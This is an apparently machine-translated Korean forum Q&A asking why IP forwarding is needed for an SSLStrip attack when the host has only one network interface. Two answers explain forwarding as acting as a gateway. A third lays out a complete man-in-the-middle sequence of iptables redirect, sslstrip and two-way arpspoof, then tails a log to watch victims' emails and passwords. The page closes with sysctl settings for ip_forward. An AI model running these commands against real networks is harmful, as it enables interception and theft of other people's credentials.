SSL 스트립 공격: "echo 1 > /proc/sys/net/ipv4/ip_forward"와 혼동됨

SSL 스트립 공격: "echo 1 > /proc/sys/net/ipv4/ip_forward"와 혼동됨

SSLStrip공격 에서는 IP forwarding다음 명령을 사용하여 활성화해야 합니다.

echo 1 > /proc/sys/net/ipv4/ip_forward

나는 이 명령을 통해 호스트가 두 네트워크 간에 패킷을 전달하는 라우터 역할을 할 수 있다는 것을 이해합니다. 이것이 나의 혼란입니다. 네트워크 인터페이스가 하나만 있는데 왜 IP 전달을 구성할 수 있나요? eth0내 상자에 있는 건 이게 어떻게 작동하는 걸까요?

인터페이스가 하나만 있을 때 전달이 작동합니까? 우리 둘은 있어야 하지 않나요?

답변1

NIC(귀하의 경우 eth0)가 물리적으로 연결된 네트워크만 고려하고 있기 때문에 혼란스럽습니다. 그러나 컴퓨터는 더 많은 네트워크에 액세스할 수 있습니다.

귀하의 컴퓨터에서 IP 전달을 활성화하면 귀하가 의도하지 않은 패킷을 받았을 때 귀하에게 알려줄 것입니다.앞으로이를 버리는 대신 대상(또는 다음 홉)으로 이동합니다. 이 경우 귀하의 컴퓨터는 다음과 같이 작동합니다.게이트웨이그 특정 목적지로.

답변2

포트 전달을 활성화하면 귀하의 컴퓨터 IP(eth0)를 게이트웨이로 구성하고 귀하에게 패킷을 보낼 수 있습니다. iptables FORWARD 링크가 이러한 패킷을 수락하면 해당 패킷을 대상으로 전달하게 됩니다.

답변3

root@kali# echo 1 > /proc/sys/net/ipv4/ip_forward

root@kali# iptables -t nat -A PREROUTING --dport 80 -j REDIRECT --to-port 1000

root@kali# sslstrip -a -l 1000 -k

이제 새 터미널에서 쓰기

root@kali# arpspoof -i eth0 victimip routerip

새 터미널에 작성하십시오.

root@kali# arpspoof -i eth0 routerip victimip

실시간 이메일과 비밀번호를 보려면 다른 터미널을 작성해야 합니다.

root@kali# tail -f sslstrip.log

알림: 모든 터미널을 닫아서는 안 됩니다.

출력 번호 1은 IP 전달이 활성화되었음을 나타냅니다. 위의 값은 Linux proc 파일 시스템, 보다 정확하게는 실제 파일 /proc/sys/net/ipv4/ip_forward파일에서 읽습니다.

# cat /proc/sys/net/ipv4/ip_forward
1

실행 중인 Linux 시스템에서 IP 전달을 비활성화하려면 다음을 실행합니다.

 # echo 0 > /proc/sys/net/ipv4/ip_forward

위의 변경 사항은 재부팅 후에도 유지되지 않습니다. Linux 시스템에서 IP 전달을 영구적으로 비활성화하려면 /etc/sysctl.conf다음 줄을 편집하고 추가합니다.

net.ipv4.ip_forward = 0

Linux에서 IP 전달을 활성화하는 과정은 위의 비활성화와 동일하지만 숫자 1을 사용하여 IP 전달을 활성화합니다.

# echo 1 > /proc/sys/net/ipv4/ip_forward

변경 사항을 영구적으로 적용하려면 edit 에 다음 줄을 삽입하거나 편집하세요 /etc/sysctl.conf.

net.ipv4.ip_forward = 1

관련 정보